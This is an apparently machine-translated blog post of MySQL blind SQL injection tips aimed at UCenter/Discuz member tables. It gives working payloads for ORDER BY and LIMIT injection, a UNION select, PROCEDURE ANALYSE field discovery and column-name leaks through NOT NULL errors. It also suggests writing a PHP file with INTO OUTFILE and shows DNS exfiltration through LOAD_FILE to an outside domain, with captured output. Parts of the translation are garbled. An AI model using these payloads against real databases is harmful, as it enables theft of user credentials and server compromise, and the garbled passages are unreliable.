Some tips for Mysql alternative blinds

A lot of skills learned from foreign paper, but not many people in the country to use, so issued, notes under ~

First, the parameter injection technique for ORDER by:
Both methods are the same way of thinking.

Example. "Select Username,password from Uc_members order by". $_get[' Oderby ']

A. Common use methods:
1.[sql] Select Username,password from Uc_members ORDER by 1,if ((select 1) =2,1, (select value from Uc_settings);
return error: [ERR] 1242-subquery returns more than 1 row
2.[sql] Select Username,password from Uc_members ORDER by 1,if ((select 1) =1,1, (select value from Uc_settings);
Return to normal.

B. Foreign paper See the method:
1.[sql] Select Username,password from Uc_members ORDER by 1, (Select Case When (2<1) then 1 else 1* (select username from uc_members) end) = 1;
return error: [ERR] 1242-subquery returns more than 1 row
2.[sql] Select Username,password from Uc_members ORDER by 1, (Select Case When (2>1) then 1 else 1* (select username from uc_members) end) = 1;
Return to normal.

Second, the parameter injection technique of limit:

A.order by the limit parameter injection, because the normal SQL statement order by after the Union can not be followed, so there is no good way, a chicken idea: into outfile '/www/root/xxx.php ';

B.limit before the order by the injection, it is more convenient, the latter can be directly connected to the Union Select, any bet can be done:
SELECT * FROM Cdb_members limit 1 Union Select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7
Here's a tip, you can get the field name using procedure analyse:
SELECT * from cdb_members where uid=1 limit procedure analyse ()
However, procedure analyse can also be used after ORDER by:
[SQL] SELECT * FROM Cdb_members ORDER BY uid DESC LIMIT 1 procedure analyse ()
[ERR] 1386-can ' t use ORDER clause with this procedure

Three, unable to guess the skill of the field:

The field name of a table cannot be guessed when the following version or INFORMATION_SCHEMA cannot be accessed, so you can use%0 in the subquery to get the column name with the error MYSQL5. Take Ucenter's uc_members as an example.

1. Guessing number of columns: Select 1 from ' Uc_members ' where (SELECT * from ' uc_members ') = (1)
Return error: #1241-operand should contain column (s)
2.SELECT 1 from ' Uc_members ' where (1,2,3,4,5,6,7,8,9,10,11,12) = (select * from ' uc_members ' union SELECT 1,2,3,4,5,6,7,8, 9,10,11,12 limit 1)
Return to normal.
3.SELECT 1 from ' Uc_members ' where (1,2,3,4,5,6,7,8,9,10,11,12) = (select * from ' uc_members ' union SELECT 1%0,2,3,4,5,6,7, 8,9,10,11,12 limit 1)
Return error: #1048-column ' uid ' cannot be null
4.SELECT 1 from ' Uc_members ' where (1,2,3,4,5,6,7,8,9,10,11,12) = (select * from ' uc_members ' union SELECT 1,2%0,3,4,5,6,7, 8,9,10,11,12 limit 1)
Return error: #1048-column ' username ' cannot be null
5 .....

Note: 5.1 or later does not apply, the field must be non-null (NOT NULL)

Iv. tips for using DNS to resolve blinds under windows:

If the blinds are tired, or if the page is exactly the same as the 1=1 or 1=2, it is a good idea to use DNS for injection, as long as MySQL, under the root authority of the win environment, uses the Load_file function to read the remote file. Build a DNS server locally, and then turn the NS server for the specific domain name. Then inject and grab the packet.

Locally tested (single quotes can be encoded in the actual injection): Select Load_file (concat (' \\\\aaa1. ', (select User ()), '. Oldjun.com\\a.txt '), capture the results of the Select successfully:
2928.524843192.168.9.107192.168.1.2DNSStandard query A [email protected]

：

Some tips for Mysql alternative blinds